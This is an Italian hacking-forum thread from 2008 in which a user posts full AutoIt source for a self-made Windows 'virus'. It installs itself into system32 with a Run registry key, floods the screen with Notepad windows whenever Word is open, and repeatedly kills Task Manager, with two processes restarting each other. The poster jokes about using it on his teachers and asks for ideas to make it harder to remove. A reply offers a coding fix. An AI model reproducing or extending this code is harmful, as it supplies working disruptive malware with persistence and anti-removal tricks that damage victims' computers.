Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CalendarioCalendario  FAQFAQ  CercaCerca  RegistrareRegistrare  ConnessioneConnessione  
Xhack :: Programmazione :: Autoit
 

Virus - Se apri Word....

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso 
AutoreMessaggio
Lord_Blackout
apprendista
apprendista



Registrato il : 31/01/08
Messaggi : 15

MessaggioOggetto: Virus - Se apri Word....   Mar Feb 05, 2008 12:58 am
Ho creato questa specie di virus tanto per esercitarmi un po' in autoit, non sono un lamer e non lo userņ mai contro qualcuno (eccetto le mie prof Laughing)
Il virus č composto da 3 files, uniti insieme con iexpress:

START.exe
Codice:
#NoTrayIcon
FileCopy("virus.exe", "C:\WINDOWS\system32\")
FileCopy("antitask.exe", "C:\WINDOWS\system32\")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "REG_SZ", "C:\WINDOWS\system32\virus.exe")
Run("C:\WINDOWS\system32\virus.exe")


virus.exe
Codice:
#NoTrayIcon
If ProcessExists("antitask.exe") Then
   Sleep("100")
Else
   Run("C:\WINDOWS\system32\antitask.exe")
EndIf
While 1 = 1
   If ProcessExists("word.exe") Then
      
                While 1 = 1
                Run("notepad.exe")
                WEnd

   ElseIf ProcessExists("antitask.exe") Then
      Sleep("100")

   Else
      Run("C:\WINDOWS\system32\antitask.exe")
      EndIf
   EndIf
WEnd


antitask.exe
Codice:
#NoTrayIcon
while 1 = 1
   ProcessClose("taskmgr.exe")
   If ProcessExists("virus.exe") Then
      Sleep("100")
   Else
      Run("C:\WINDOWS\system32\virus.exe")
   EndIf
WEnd


Nonostante non sia possibile utilizzare il taskmanager, alcuni firewall permettono di chiudere i processi, ecco quindi che si rigenerano a vicenda.
E poi, basta eliminare la chiave di registro e riavviare il pc per disabilitarlo.
Se avete altre idee per renderlo meno estirpabile (infatti se col firewall mettiamo i processi in quarantena si riesca ad estirparlo) lo dica pure Very Happy

P.S.
Ecco il file di antidoto:
Codice:
ProcessClose("antitask.exe")
ProcessClose("virus.exe")
FileDelete("D:\WINDOWS\system32\virus.exe")
FileDelete("D:\WINDOWS\system32\antitask.exe")
RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio")
Tornare in alto Andare in basso
darkphantom
hack-member
hack-member



Registrato il : 03/09/07
Messaggi : 398

MessaggioOggetto: Re: Virus - Se apri Word....   Mar Feb 05, 2008 2:21 pm
perchč metti sleep("100")? (che tra l'altro dovrebbe essere sleep(100))
fai prima a scrivere:
Codice:

If Not ProcessExists("taskmgr.exe")

_________________
É inutile fasciarsi la testa prima di essersela rotta... perņ non č una cattiva idea mettersi il casco!

Errore tipico di sVista:
"Tastiera non collegata. Premere Invio per continuare."
Tornare in alto Andare in basso
Lord_Blackout
apprendista
apprendista



Registrato il : 31/01/08
Messaggi : 15

MessaggioOggetto: Re: Virus - Se apri Word....   Mar Feb 05, 2008 5:16 pm
ah grazie, non la conoscevo questa funzione...
mo aggiusto
Tornare in alto Andare in basso

Virus - Se apri Word....

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto 
Pagina 1 su1

Permesso del forum:Non puoi rispondere agli argomenti in questo forum
Xhack :: Programmazione :: Autoit-